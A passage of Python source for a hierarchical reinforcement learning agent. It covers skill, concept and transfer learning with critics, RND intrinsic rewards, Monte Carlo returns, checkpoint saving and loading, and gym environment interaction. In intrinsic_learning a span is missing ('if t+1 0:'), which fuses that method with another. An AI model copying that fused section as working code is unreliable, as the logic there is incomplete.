alpha_loss.mean().backward()\n self.transfer_actor.alpha_optim.step()\n self.transfer_actor.alpha = self.transfer_actor.log_alpha.exp()\n\n self.transfer_actor.Alpha_optim.zero_grad()\n Alpha_loss.mean().backward()\n self.transfer_actor.Alpha_optim.step()\n self.transfer_actor.Alpha = self.transfer_actor.log_Alpha.exp()\n\n self.transfer_actor.actor.optimizer.zero_grad()\n pi_loss.mean().backward()\n clip_grad_norm_(self.transfer_actor.actor.parameters(), self.clip_value)\n self.transfer_actor.actor.optimizer.step()\n\n if CG:\n self.PA_ST_tl = PA_ST.detach().clone() \n\n self.transfer_actor.update_targets(self.target_update_rate) \n\n def MC_learning(self, episode):\n N = len(episode)\n if N > 0:\n G = 0\n returns = torch.zeros((self.n_concepts, self.n_skills + 1)).to(device)\n visited = torch.zeros((self.n_concepts, self.n_skills + 1)).to(device)\n for i in range(N-1, -1, -1):\n S, A, R = episode[i]\n G = self.gamma_E * G + R\n returns[int(S),int(A)] += G\n visited[int(S),int(A)] += 1\n self.NAST_MC = (1-0.1) * self.NAST_MC + visited\n self.QAST_MC = (self.QAST_MC + (returns - visited * self.QAST_MC)/self.NAST_MC.clamp(1.0,np.infty)).detach().clone() \n\n def intrinsic_learning(self, trajectory, reset=False):\n N = len(trajectory) \n if N > 0:\n trajectory = np.array(trajectory)\n s = torch.FloatTensor(trajectory[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = trajectory[:,self.s_dim].astype('int')\n ns = torch.FloatTensor(trajectory[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n # d = torch.FloatTensor(trajectory[:,2*self.s_dim+2]).to(device).view(-1,1)\n T = int(trajectory[0,2*self.s_dim+3])\n\n self.RND.update_obs_rms(s, T)\n ri_exp = self.RND(ns, T).sum(1, keepdim=True)\n self.r_max = max(self.r_max, ri_exp.max().item())\n \n rffs_int = torch.FloatTensor([self.RND.rff_int.update(rew) for rew in ri_exp.detach().squeeze().tolist()]).to(device)\n self.RND.rff_rms_int.update(rffs_int, T)\n ri_exp_normalized 
= ri_exp.detach() / self.RND.rff_rms_int.var.sqrt()\n\n mask = torch.rand(len(ri_exp)).to(device)\n mask = (mask < self.RND_update_proportion).type(torch.FloatTensor).to(device)\n intrinsic_loss = (ri_exp * mask).sum() / torch.max(mask.sum(), torch.Tensor([1]).to(device))\n\n self.RND.predictor.optimizer.zero_grad()\n intrinsic_loss.mean().backward()\n clip_grad_norm_(self.RND.predictor.parameters(), self.clip_value)\n self.RND.predictor.optimizer.step()\n\n with torch.no_grad():\n pi_end = self.transfer_actor.actor(ns[-1,:].view(1,-1))[0].squeeze(0)[T, :]\n pi_old, log_pi_old = self.transfer_actor.actor(s)\n pi_old, log_pi_old = pi_old.detach()[:, T, :], log_pi_old.detach()[:, T, :]\n PA_T = pi_old.mean(0, keepdim=True)\n HA_sT = -(pi_old * log_pi_old).sum(1, keepdim=True)\n HA_sT_mean = HA_sT.mean() \n \n qi1_end = self.transfer_actor.qi1_exploration(ns[-1,:].view(1,-1)).squeeze(0)[T, :]\n qi2_end = self.transfer_actor.qi2_exploration(ns[-1,:].view(1,-1)).squeeze(0)[T, :]\n qi_end = torch.min(qi1_end, qi2_end)\n vi_end = (pi_end * qi_end).sum()\n\n qi1_exp = self.transfer_actor.qi1_exploration(s)[:,T,:]\n qi2_exp = self.transfer_actor.qi2_exploration(s)[:,T,:]\n qi_exp = torch.min(qi1_exp, qi2_exp)\n vi_exp = (pi_old * qi_exp).sum(1, keepdim=True)\n \n return_i = torch.zeros_like(ri_exp)\n lastGAE = 0.0\n for t in range(N-1, -1, -1):\n next_val = vi_exp[t+1,:] if t+1 0:\n s_batch = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n s_batch_prop = torch.FloatTensor(batch[:,self.dims['init_prop']:self.dims['last_prop']]).to(device)\n a_batch = torch.FloatTensor(batch[:,self.s_dim:self.sa_dim]).to(device)\n r_batch = torch.FloatTensor(batch[:,self.sa_dim]).view(-1,1).to(device)\n ns_batch = torch.FloatTensor(batch[:,self.sa_dim+1+self.dims['init_ext']:self.sa_dim+1+self.dims['last_ext']]).to(device)\n d_batch = torch.FloatTensor(batch[:,self.sars_dim]).view(-1,1).to(device)\n T_batch = batch[:,self.sarsd_dim].astype('int') \n\n if 
not only_metrics:\n # Optimize q networks\n q1_E = self.critic1['sl'](s_batch, a_batch)[np.arange(batch_size), T_batch].view(-1,1)\n q2_E = self.critic2['sl'](s_batch, a_batch)[np.arange(batch_size), T_batch].view(-1,1)\n next_v_E = self.v_target['sl'](ns_batch)[np.arange(batch_size), T_batch].view(-1,1) \n\n q_approx_E = r_batch + self.gamma_E * next_v_E * (1-d_batch)\n \n q1_loss = self.critic1['sl'].loss_func(q1_E, q_approx_E.detach())\n self.critic1['sl'].optimizer.zero_grad()\n q1_loss.backward()\n clip_grad_norm_(self.critic1['sl'].parameters(), self.clip_value)\n self.critic1['sl'].optimizer.step()\n \n q2_loss = self.critic2['sl'].loss_func(q2_E, q_approx_E.detach())\n self.critic2['sl'].optimizer.zero_grad()\n q2_loss.backward()\n clip_grad_norm_(self.critic2['sl'].parameters(), self.clip_value)\n self.critic2['sl'].optimizer.step() \n\n # Optimize v network\n a_batch_A, log_pa_sApT_A = self.actor.sample_actions_and_llhoods_for_all_skills(s_batch_prop.detach())\n if not self.joint:\n A_batch = T_batch\n else:\n A_batch = self.critic1['ql'].sample_skills(s_batch, T_batch)\n a_batch_off = a_batch_A[np.arange(batch_size), A_batch, :]\n log_pa_sT = log_pa_sApT_A[np.arange(batch_size), A_batch].view(-1,1)\n \n q1_off_E = self.critic1['sl'](s_batch.detach(), a_batch_off)\n q2_off_E = self.critic2['sl'](s_batch.detach(), a_batch_off)\n q_off_E = torch.min(torch.stack([q1_off_E, q2_off_E]), 0)[0][np.arange(batch_size), T_batch].view(-1,1)\n \n v_approx_E = q_off_E - self.alpha['sl'] * log_pa_sT\n\n if not only_metrics:\n v_E = self.v['sl'](s_batch)[np.arange(batch_size), T_batch].view(-1,1)\n \n task_mask = torch.zeros(batch_size, self.n_skills).float().to(device)\n task_mask[np.arange(batch_size), T_batch] = torch.ones(batch_size).float().to(device)\n task_count = task_mask.sum(0).view(-1,1)\n task_mask_distribution = task_mask / (task_count.view(1,-1) + 1e-10)\n Ha_sT = -(log_pa_sT * task_mask_distribution).sum(0)\n if self.entropy_annealing: alpha_gradient = 
Ha_sT.detach() - self.threshold_entropy_alpha\n\n if not only_metrics:\n v_loss = self.v['sl'].loss_func(v_E.view(-1,1), v_approx_E.view(-1,1).detach())\n self.v['sl'].optimizer.zero_grad()\n v_loss.backward()\n clip_grad_norm_(self.v['sl'].parameters(), self.clip_value)\n self.v['sl'].optimizer.step()\n updateNet(self.v_target['sl'], self.v['sl'], self.target_update_rate)\n \n # Optimize skill network\n self.actor.optimizer.zero_grad() \n pi_loss = -(v_approx_E).mean() \n pi_loss.backward() \n \n clip_grad_norm_(self.actor.parameters(), self.clip_value)\n self.actor.optimizer.step() \n\n # Optimize dual variable\n if self.entropy_annealing: \n log_alpha = torch.log(self.alpha['sl'] + 1e-6)\n log_alpha -= self.lr * alpha_gradient\n self.alpha['sl'] = torch.exp(log_alpha).clamp(1e-10, 1e+3)\n\n self.threshold_entropy_alpha = np.max([self.threshold_entropy_alpha - self.delta_threshold_entropy_alpha, self.min_threshold_entropy_alpha])\n \n else:\n log_pa_sT = torch.zeros(1).to(device) \n Ha_sT = torch.zeros(1).to(device)\n \n if only_metrics:\n metrics = {\n 'H(a|s,T)': Ha_sT.mean().detach().cpu().numpy() \n } \n return metrics \n \n def learn_concepts(self):\n batch_list = self.memory['ql'].sample(self.batch_size['ql']*2)\n batch = np.array(batch_list)\n del batch_list\n \n batch_size = batch.shape[0]\n\n if batch_size > 0:\n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n T = batch[:,2*self.s_dim+3].astype('int')\n\n if self.stoA_learning_type == 'DQL':\n q = self.critic1['ql'](s)[np.arange(batch_size), T, :]\n PA_sT = torch.exp((q-q.max(1, keepdim=True)[0])/1.0)\n PA_sT = PA_sT / PA_sT.sum(1, keepdim=True)\n else:\n PA_sT = self.critic1['ql'].actor(s)[0][np.arange(s.shape[0]), T, :]\n A_off = PA_sT.argmax(1)\n\n A_off_one_hot = torch.zeros(batch_size, 
self.n_skills+1).to(device)\n A_off_one_hot[np.arange(batch_size), A_off] = torch.ones(batch_size,).to(device)\n \n A_one_hot = torch.zeros(batch_size, self.n_skills+1).to(device)\n A_one_hot[np.arange(batch_size), A] = torch.ones(batch_size,).to(device)\n\n T_one_hot = torch.zeros(batch_size, self.n_tasks['cl']).to(device)\n T_one_hot[np.arange(batch_size), T] = torch.ones(batch_size,).to(device)\n \n PT = T_one_hot.sum(0) + 1e-10\n PT = PT.view(-1,1) / PT.sum()\n PA_T_data = (A_one_hot.unsqueeze(1) * T_one_hot.unsqueeze(2)).sum(0) + 1e-10\n PA_T_data /= PA_T_data.sum(1, keepdim=True)\n \n PS_s, log_PS_s = self.classifier(s)\n PnS_ns = self.classifier(ns)[0]\n \n NAST_new = ((PS_s.unsqueeze(2) * PA_sT.unsqueeze(1)).unsqueeze(1) * T_one_hot.unsqueeze(2).unsqueeze(3)).sum(0)\n NnSAST_new = (((PS_s.unsqueeze(2) * A_one_hot.unsqueeze(1)).unsqueeze(1) * T_one_hot.unsqueeze(2).unsqueeze(3)).unsqueeze(4) * PnS_ns.unsqueeze(1).unsqueeze(2).unsqueeze(3)).sum(0)\n df1 = 0.01 * (self.NAST_cl.sum(2, keepdim=True) >= 1.0).float() # TODO: add to params\n df2 = 0.01 * (self.NnSdoAST_cl.sum(3, keepdim=True) >= 1.0).float()\n NAST = (1-df1) * self.NAST_cl + NAST_new\n NnSAST = (1-df2) * self.NnSdoAST_cl + NnSAST_new\n\n PS_T = NAST.sum(2) / NAST.sum(2).sum(1, keepdim=True)\n PA_ST = NAST / NAST.sum(2, keepdim=True)\n PnS_TdoA = NnSAST.sum(1) / NnSAST.sum(1).sum(2, keepdim=True)\n PnS_STdoA = NnSAST / NnSAST.sum(3, keepdim=True)\n PA_T = NnSAST.sum((1,3)) / NnSAST.sum((1,3)).sum(1, keepdim=True)\n PA_T_policy = NAST.sum(1) / NAST.sum(1).sum(1, keepdim=True)\n\n log_PS_T = torch.log(PS_T+1e-10)\n log_PA_ST = torch.log(PA_ST + 1e-10) \n log_PnS_TdoA = torch.log(PnS_TdoA+1e-10)\n log_PnS_STdoA = torch.log(PnS_STdoA + 1e-10)\n \n HS_T = -(PS_s * log_PS_T[T, :]).sum(1).mean()\n HS_s = -(PS_s * log_PS_s).sum(1).mean()\n ISs_T = HS_T - HS_s\n \n IS_factor = (1/((self.n_skills+1) * PA_T[T, A])).view(-1,1).detach()\n \n HA_T = -(PA_T_policy * torch.log(PA_T_policy+1e-10)).sum(1).mean()\n 
HA_ST = -((log_PA_ST[T,:,:] * PA_sT.unsqueeze(1)).sum(2) * PS_s).sum(1).mean() \n ISA_T = HA_T.detach() - HA_ST\n \n HnS_TdoA_wIS = -(PS_s * (PnS_ns * log_PnS_TdoA.detach()[T, A, :]).sum(1, keepdim=True)).sum(1).mean()\n HnS_TdoA = -(PnS_ns * log_PnS_TdoA[T, A, :]* IS_factor.view(-1,1)).sum(1).mean() # * IS_factor.view(-1,1)\n HnS_STdoA = -(PS_s * (PnS_ns.unsqueeze(1) * log_PnS_STdoA[T, :, A, :] * IS_factor.view(-1,1,1)).sum(2)).sum(1).mean() # * IS_factor.view(-1,1,1)\n InSS_TdoA = HnS_TdoA - HnS_STdoA\n \n beta1 = 1.0e-1 # TODO: add to params\n beta2 = 0.25e-1 # TODO: add to params\n alpha2 = 1.0*beta1 / (1-beta2) # TODO: add to params\n\n classification_loss = -torch.logsumexp(log_PA_ST[T, :, A_off] + log_PS_s, dim=1).mean()\n model_loss = -torch.logsumexp(torch.log((PnS_STdoA[T, :, A, :] * PnS_ns.unsqueeze(1)).sum(2)+1e-10) + log_PS_s, dim=1).mean()\n\n classifier_loss = (beta1 + alpha2*beta2) * ISs_T - ISA_T - alpha2 * InSS_TdoA \n classifier_loss_norm = classifier_loss\n\n self.classifier.optimizer.zero_grad()\n classifier_loss_norm.backward()\n clip_grad_norm_(self.classifier.parameters(), self.clip_value)\n self.classifier.optimizer.step()\n\n self.NAST_cl = NAST.detach().clone()\n self.NnSdoAST_cl = NnSAST.detach().clone()\n \n return(classifier_loss.detach().item(), \n HS_T.detach().item(),\n HS_s.detach().item(),\n ISs_T.detach().item(),\n HA_ST.detach().item(),\n HA_T.detach().item(),\n ISA_T.detach().item(),\n HnS_STdoA.detach().item(),\n HnS_TdoA.detach().item(),\n InSS_TdoA.detach().item(),\n classification_loss.detach().item(),\n model_loss.detach().item()) \n \n def estimate_metrics(self, learning_type):\n metrics = {}\n with torch.no_grad():\n if learning_type == 'sl':\n metrics = self.learn_skills(only_metrics=True)\n elif learning_type == 'ql':\n metrics = self.learn_DQN(only_metrics=True)\n return metrics\n \n def save(self, common_path, specific_path, learning_type):\n self.params['alpha'] = self.alpha\n 
self.params['init_threshold_entropy_alpha'] = self.threshold_entropy_alpha\n self.params['init_epsilon'] = self.epsilon\n \n pickle.dump(self.params,open(common_path+'/agent_params.p','wb'))\n\n if learning_type in ['sl', 'ql']:\n data_batches = {'l': len(self.memory[learning_type].data)//20000+1}\n for i in range(0, data_batches['l']):\n if i+1 < data_batches['l']:\n pickle.dump(self.memory[learning_type].data[20000*i:20000*(i+1)],open(common_path+'/memory_'+learning_type+str(i+1)+'.p','wb'))\n else:\n pickle.dump(self.memory[learning_type].data[20000*i:-1],open(common_path+'/memory_'+learning_type+str(i+1)+'.p','wb'))\n pickle.dump(data_batches,open(common_path+'/data_batches_'+learning_type+'.p','wb'))\n\n if learning_type in ['sl', 'ql']:\n torch.save(self.critic1[learning_type].state_dict(), specific_path+'_critic1_'+learning_type+'.pt')\n if self.stoA_learning_type == 'DQL':\n torch.save(self.critic2[learning_type].state_dict(), specific_path+'_critic2_'+learning_type+'.pt')\n \n if learning_type == 'sl':\n torch.save(self.v[learning_type].state_dict(), specific_path+'_v_'+learning_type+'.pt')\n torch.save(self.v_target[learning_type].state_dict(), specific_path+'_v_target_'+learning_type+'.pt')\n torch.save(self.actor.state_dict(), specific_path+'_actor_'+learning_type+'.pt')\n\n if learning_type == 'tl':\n torch.save(self.transfer_actor.state_dict(), specific_path+'_transfer_actor_'+learning_type+'.pt')\n torch.save(self.RND.state_dict(), specific_path+'_RDN_'+learning_type+'.pt')\n pickle.dump(self.NAST_MC,open(specific_path+'_NAST_MC_'+learning_type+'.p','wb'))\n pickle.dump(self.QAST_MC,open(specific_path+'_QAST_MC_'+learning_type+'.p','wb'))\n pickle.dump(self.PA_ST_tl,open(specific_path+'_PA_ST_'+learning_type+'.p','wb'))\n\n elif learning_type == 'cl':\n torch.save(self.classifier.state_dict(), specific_path+'_classifier.pt')\n pickle.dump(self.NAST_cl,open(specific_path+'_NAST_'+learning_type+'.p','wb')) \n 
pickle.dump(self.NnSdoAST_cl,open(specific_path+'_NnSdoAST_'+learning_type+'.p','wb'))\n \n def load(self, common_path, specific_path, learning_type, load_memory=True):\n if learning_type in ['sl', 'ql' ]:\n if load_memory: \n data_batches = pickle.load(open(common_path+'/data_batches_'+learning_type+'.p','rb'))\n pointer = 0\n for i in range(0, data_batches['l']):\n try:\n data = pickle.load(open(common_path+'/memory_'+learning_type+str(i+1)+'.p','rb'))\n self.memory[learning_type].data += data\n pointer += len(data)\n except:\n pass\n self.memory[learning_type].pointer = pointer % self.memory[learning_type].capacity\n self.memory[learning_type].data = self.memory[learning_type].data[-self.memory[learning_type].capacity:]\n\n if learning_type == 'sl': \n self.v[learning_type].load_state_dict(torch.load(specific_path+'_v_'+learning_type+'.pt'))\n self.v_target[learning_type].load_state_dict(torch.load(specific_path+'_v_target_'+learning_type+'.pt'))\n self.v[learning_type].train()\n self.v_target[learning_type].train() \n\n self.actor.load_state_dict(torch.load(specific_path+'_actor_'+learning_type+'.pt'))\n self.actor.train()\n\n if learning_type in ['sl', 'ql']:\n self.critic1[learning_type].load_state_dict(torch.load(specific_path+'_critic1_'+learning_type+'.pt'))\n if self.stoA_learning_type == 'DQL':\n self.critic2[learning_type].load_state_dict(torch.load(specific_path+'_critic2_'+learning_type+'.pt'))\n\n self.critic1[learning_type].train()\n if self.stoA_learning_type == 'DQL':\n self.critic2[learning_type].train() \n\n if learning_type == 'tl':\n self.transfer_actor.load_state_dict(torch.load(specific_path+'_transfer_actor_'+learning_type+'.pt'))\n self.RND.load_state_dict(torch.load(specific_path+'_RDN_'+learning_type+'.pt')) \n self.RND.train()\n\n if learning_type == 'cl':\n self.classifier.load_state_dict(torch.load(specific_path+'_classifier.pt'))\n self.classifier.eval()\n try:\n self.PS_T = 
pickle.load(open(specific_path+'_PS_T_'+learning_type+'.p','rb'))\n self.PA_ST = pickle.load(open(specific_path+'_PA_ST_'+learning_type+'.p','rb'))\n except:\n pass\n self.NAST_cl = pickle.load(open(specific_path+'_NAST_'+learning_type+'.p','rb')) \n self.NnSdoAST_cl = pickle.load(open(specific_path+'_NnSdoAST_'+learning_type+'.p','rb'))\n \n try:\n self.PnS_STdoA = pickle.load(open(specific_path+'_PnS_STdoA_'+learning_type+'.p','rb'))\n except:\n self.PnS_STdoA = torch.ones(self.n_tasks['ql'], self.n_concepts, self.n_skills+1, self.n_concepts).to(device) / self.n_concepts\n\n def classify(self, T=0, path='', data=None):\n if data is None:\n data = self.memory['ql'].data\n task_data = [i for i in data if int(i[2*self.s_dim+3]) == T]\n task_data = np.array(task_data) \n else:\n task_data = np.array(data)\n data_size = task_data.shape[0]\n \n if data_size > 0:\n s = task_data[:,:self.s_dim]\n s_cuda = torch.FloatTensor(s[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n PS_s = self.classifier(s_cuda)[0]\n numpy_PS_s = PS_s.detach().cpu().numpy()\n S = numpy_PS_s.argmax(1).reshape(-1,1)\n \n x, y, q = s[:,0].reshape(-1,1), s[:,1].reshape(-1,1), s[:,3:7]\n cos_half_theta = 1-2*(q[:,2]**2+q[:,3]**2)\n sin_half_theta = 2*(q[:,0]*q[:,3] + q[:,1]*q[:,2])\n theta = np.arctan2(sin_half_theta, cos_half_theta).reshape(-1,1)\n\n angles = np.linspace(-np.pi, np.pi, 9)\n deltas = theta - angles.reshape(1,-1)\n group_id = (np.abs(deltas) <= np.pi/8).argmax(1).reshape(-1,1)\n group_id = np.array([group_id[i] if group_id[i] != 8 else 0 for i in range(0, data_size)])\n export_data = np.concatenate((x, y, theta, S, group_id.reshape(-1,1), numpy_PS_s), axis=1)\n np.savetxt(path + 'classified_samples_'+str(T)+'.txt', export_data)\n print(\"Samples classified\")\n \n def restart_policies(self): \n self.critic1['ql'] = discrete_AC(self.n_skills+1, self.dims['last_ext']-self.dims['init_ext'], self.n_tasks['ql'], lr=self.lr).to(device)\n\nclass System:\n def __init__(self, 
params, agent_params={}, skill_learning=True):\n \n self.params = params\n default_params = {\n 'seed': 1000,\n 'joint_learning': False,\n 'joint_cycles': 200,\n 'env_names_sl': [],\n 'env_names_ql': [],\n 'env_names_tl': [],\n 'env_steps_sl': 1,\n 'env_steps_ql': 5,\n 'env_steps_tl': 5, \n 'grad_steps': 1, \n 'init_steps': 10000,\n 'max_episode_steps': 1000,\n 'tr_steps_sl': 1000,\n 'tr_steps_ql': 600,\n 'tr_epsd_sl': 4000,\n 'tr_epsd_ql': 6000,\n 'tr_epsd_wu': 40,\n 'tr_epsd_tl': 100,\n 'tr_steps_cl': 100000,\n 'tr_steps_tl': 100,\n 'eval_epsd_sl': 10,\n 'eval_epsd_interval': 20,\n 'eval_epsd_ql': 5,\n 'eval_epsd_tl': 5,\n 'eval_steps_sl': 1000,\n 'eval_steps_ql': 600,\n 'eval_steps_tl': 1800,\n 'batch_size': 256, \n 'render': True, \n 'reset_when_done': True, \n 'store_video': False,\n 'storing_path': '',\n 'MT_steps': 200,\n 'update_steps_tl': 4,\n 'active_RND': True,\n 'masked_done': True,\n 'active_MC': True \n }\n\n for key, value in default_params.items():\n if key not in self.params.keys():\n self.params[key] = value\n\n self.seed = self.params['seed']\n set_seed(self.seed)\n self.np_random, _ = seeding.np_random(self.seed)\n self.env_names = {\n 'sl': self.params['env_names_sl'],\n 'ql': self.params['env_names_ql'],\n 'cl': self.params['env_names_ql'],\n 'tl': self.params['env_names_tl']\n }\n self.n_tasks = {\n 'sl': len(self.env_names['sl']),\n 'ql': len(self.env_names['ql']),\n 'cl': len(self.env_names['ql']),\n 'tl': len(self.env_names['tl'])\n }\n self.steps = {\n 'env': {\n 'sl': self.params['env_steps_sl'],\n 'ql': self.params['env_steps_ql'],\n 'tl': self.params['env_steps_tl']\n },\n 'grad': self.params['grad_steps'],\n 'init': self.params['init_steps'],\n 'tr': {\n 'sl': self.params['tr_steps_sl'],\n 'ql': self.params['tr_steps_ql'],\n 'cl': self.params['tr_steps_cl'],\n 'tl': self.params['tr_steps_tl']\n },\n 'MT': self.params['MT_steps'],\n 'update': {\n 'tl': self.params['update_steps_tl']\n },\n 'eval': {\n 'sl': 
self.params['eval_steps_sl'],\n 'ql': self.params['eval_steps_ql'],\n 'tl': self.params['eval_steps_tl']\n }\n }\n self.epsds = {\n 'tr': {\n 'sl': self.params['tr_epsd_sl'],\n 'ql': self.params['tr_epsd_ql'],\n 'tl': self.params['tr_epsd_tl'],\n 'wu': self.params['tr_epsd_wu']\n },\n 'eval': {\n 'sl': self.params['eval_epsd_sl'],\n 'ql': self.params['eval_epsd_ql'],\n 'tl': self.params['eval_epsd_tl'],\n 'interval': self.params['eval_epsd_interval']\n },\n }\n self.joint_cycles = self.params['joint_cycles']\n \n self.batch_size = self.params['batch_size']\n self.render = self.params['render']\n self.store_video = self.params['store_video']\n self.reset_when_done = self.params['reset_when_done']\n self._max_episode_steps = self.params['max_episode_steps']\n \n self.envs = {}\n self.joint = self.params['joint_learning']\n self.active_RND = self.params['active_RND']\n self.active_MC = self.params['active_MC']\n self.masked_done = self.params['masked_done']\n self.learning_type = 'sl' if not self.joint else 'ql' # if skill_learning else 'ql'\n\n self.set_envs()\n\n self.s_dim = self.envs[self.learning_type][0].observation_space.shape[0]\n self.a_dim = self.envs[self.learning_type][0].action_space.shape[0] \n self.sa_dim = self.s_dim + self.a_dim\n self.sars_dim = self.s_dim*2 + self.a_dim + 1\n self.sarsd_dim = self.sars_dim + 1\n self.t_dim = self.sarsd_dim + 1\n self.epsd_counter = 0\n self.task = 0\n self.MT_task = 0\n\n self.min_action = self.envs[self.learning_type][0].action_space.low[0]\n self.max_action = self.envs[self.learning_type][0].action_space.high[0]\n\n n_tasks = self.n_tasks.copy()\n self.multitask_envs = {\n 'sl': False,\n 'ql': False, # TODO\n 'tl': False,\n } \n self.check_multitask(n_tasks)\n agent_params['joint_learning'] = self.joint\n self.agent = Agent(self.s_dim, self.a_dim, n_tasks, agent_params, seed=self.seed) \n\n def check_multitask(self, n_tasks):\n if self.n_tasks[self.learning_type] == 1:\n try:\n n = 
self.envs[self.learning_type][0]._n_tasks\n n_tasks[self.learning_type] = n\n self.multitask_envs[self.learning_type] = True\n self.n_MT_tasks = n\n except:\n pass \n\n def set_envs(self):\n self.envs[self.learning_type] = [] \n for i in range(0, self.n_tasks[self.learning_type]): \n self.envs[self.learning_type].append(gym.make(self.env_names[self.learning_type][i]).unwrapped)\n print(\"Created env \"+self.env_names[self.learning_type][i])\n self.envs[self.learning_type][i].reset()\n self.envs[self.learning_type][i].seed(self.seed) \n self.envs[self.learning_type][i]._max_episode_steps = self._max_episode_steps\n self.envs[self.learning_type][i].rgb_rendering_tracking = True\n \n def reset(self, change_env=False):\n if change_env: self.task = (self.task+1) % self.n_tasks[self.learning_type]\n self.envs[self.learning_type][self.task].reset() \n \n def get_obs(self):\n state = self.envs[self.learning_type][self.task]._get_obs().copy()\n return state\n \n def initialization(self, init_steps=0): \n self.reset()\n skill = 0\n if init_steps == 0: init_steps = self.steps['init']\n for init_step in range(0, init_steps * self.n_tasks[self.learning_type]):\n if self.multitask_envs[self.learning_type]:\n if (init_step % self.steps['env'][self.learning_type]) == 0 and np.random.rand()>0.95:\n skill = np.random.randint(self.agent.n_skills)\n else:\n skill = self.task\n done = self.interaction_init(skill)\n limit_reached = (init_step+1) % init_steps == 0\n if done or limit_reached: self.reset(change_env=limit_reached)\n if self.render: self.envs[self.learning_type][self.task].render() \n print(\"Finished initialization...\")\n\n def interaction_init(self, skill): \n event = np.empty(self.t_dim)\n state = self.get_obs()\n action = 2.0*np.random.rand(self.a_dim)-1.0 \n next_state, reward, done, info = self.envs[self.learning_type][self.task].step(action) \n done = done and self.reset_when_done\n if self.multitask_envs[self.learning_type] and self.learning_type == 'sl':\n 
skill_reward = info['reward_'+str(skill)]\n reward += skill_reward\n \n if self.multitask_envs[self.learning_type] and self.learning_type == 'ql':\n skill_reward = info['reward_'+str(self.MT_task)]\n reward += skill_reward\n\n event[:self.s_dim] = state\n event[self.s_dim:self.sa_dim] = action\n event[self.sa_dim] = reward\n event[self.sa_dim+1:self.sars_dim] = next_state\n event[self.sars_dim] = float(done)\n event[self.sarsd_dim] = skill\n \n self.agent.memorize(event, 'sl') \n return done\n\n def interaction(self, remember=True, explore=True, learn=True, lim=0, previous_skill = 0, joint_warmup=False): \n event = np.empty(self.t_dim)\n initial_state = self.get_obs()\n state = initial_state.copy()\n final_state = initial_state.copy()\n total_reward = 0.0\n done = end_step = False\n max_env_step = self.steps['env'][self.learning_type]\n \n task = self.MT_task if self.multitask_envs[self.learning_type] else self.task\n\n try:\n self.envs[self.learning_type][self.task]._update_quaternion()\n except:\n pass\n\n if self.learning_type == 'sl':\n if self.multitask_envs[self.learning_type]:\n if np.random.rand() > 0.95:\n skill = np.random.randint(self.agent.n_skills)\n else:\n skill = previous_skill\n else:\n skill = task\n elif self.learning_type == 'ql': \n skill = self.agent.decide(state, task, self.learning_type, explore=explore)\n elif self.learning_type == 'tl':\n if remember:\n skill = self.agent.decide(state, task, self.learning_type, explore=explore) # TODO\n else:\n skill = self.agent.decide(state, task, self.learning_type, explore=explore, rng=self.np_random) \n s_cuda = torch.FloatTensor(state[self.agent.dims['init_ext']:self.agent.dims['last_ext']]).to(device).view(1,-1)\n with torch.no_grad():\n concept = self.agent.classifier(s_cuda)[0].argmax().item()\n \n if self.env_names[self.learning_type][self.task] == 'AntCrossMaze-v3':\n self.envs[self.learning_type][self.task]._update_led_visualization(concept, skill)\n \n for env_step in itertools.count(0):\n 
action = self.agent.act(state, skill, explore=explore if (self.learning_type == 'sl' or self.joint and self.learning_type=='ql') else False)\n scaled_action = scale_action(action, self.min_action, self.max_action).reshape(-1)\n next_state, reward, done, info = self.envs[self.learning_type][self.task].step(scaled_action)\n if self.multitask_envs[self.learning_type] and self.learning_type == 'sl':\n skill_reward = info['reward_'+str(skill)]\n reward += skill_reward\n if self.multitask_envs[self.learning_type] and self.learning_type == 'ql':\n try:\n task_reward = info['reward_'+str(self.MT_task)]\n reward += task_reward\n except:\n pass\n end_step = end_step or (done and self.reset_when_done)\n total_reward += reward \n final_state = np.copy(next_state)\n\n event[:self.s_dim] = state\n event[self.s_dim:self.sa_dim] = action\n event[self.sa_dim] = reward\n event[self.sa_dim+1:self.sars_dim] = next_state\n event[self.sars_dim] = float(done)\n if not self.joint: # TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO\n event[self.sarsd_dim] = skill\n else:\n event[self.sarsd_dim] = task\n \n if remember and (self.learning_type == 'sl' or (self.learning_type == 'ql' and self.joint and not joint_warmup and skill < self.agent.n_skills)): self.agent.memorize(event.copy(), 'sl')\n if env_step < self.steps['env'][self.learning_type]-1: state = np.copy(next_state)\n if end_step or (env_step+1) >= max_env_step: break \n if self.render and ((env_step+1)%10) == 0: self.envs[self.learning_type][self.task].render()\n if learn and self.learning_type == 'ql' and self.joint and not joint_warmup: self.agent.learn_skills()\n \n if self.learning_type in ['ql', 'tl']:\n masked_done = float(done) if not self.masked_done else float(end_step)\n event = np.empty(2*self.s_dim+4) if self.learning_type == 'ql' else np.empty(2*self.s_dim+5) \n event[:self.s_dim] = initial_state \n event[self.s_dim] = skill\n event[self.s_dim+1] = total_reward\n 
event[self.s_dim+2:2*self.s_dim+2] = final_state\n event[2*self.s_dim+2] = masked_done\n event[2*self.s_dim+3] = task\n if self.learning_type == 'tl': event[2*self.s_dim+4] = concept\n if remember:\n if (self.learning_type == 'ql' and (not self.joint or self.agent.stoA_learning_type == 'SAC')) or self.learning_type == 'tl': self.agent.memorize(event.copy(), self.learning_type)\n\n if learn:\n if self.learning_type == 'sl':\n for _ in range(0, self.steps['grad']):\n self.agent.learn_skills()\n elif self.learning_type == 'ql':\n for _ in range(0, self.steps['grad']):\n if not self.joint or self.agent.stoA_learning_type == 'SAC':\n self.agent.learn_DQN() \n elif self.learning_type == 'tl':\n for _ in range(0, self.steps['grad']):\n self.agent.learn_transfer_policy(self.learning_type) \n\n return total_reward, done, event, env_step+1, skill \n\n def train_agent(self, initialization=True, skill_learning=True, storing_path='', rewards=[], metrics=[], losses=[], entropies=[], entropies_2=[], \n iter_0=0, q_learning=True, concept_learning=True, transfer_learning=True):\n if len(storing_path) == 0: storing_path = self.params['storing_path']\n\n if initialization:\n self.initialization()\n specific_path = storing_path + '/' + str(0)\n self.save(storing_path, specific_path)\n \n init_iter = 